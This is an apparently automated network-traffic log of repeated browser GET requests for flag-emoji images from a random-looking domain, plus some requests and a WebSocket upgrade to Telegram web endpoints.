Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ec-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ed-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ef-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ef-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ef-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiws HTTP/1.1Host: zws2.web.telegram.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://wkybcnfuqpgjx.ltdSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: d3I2nv+GKn1DMFIj8EjF4A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: binary
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ee-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1fd-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ef-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ef-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1ef-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1fb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
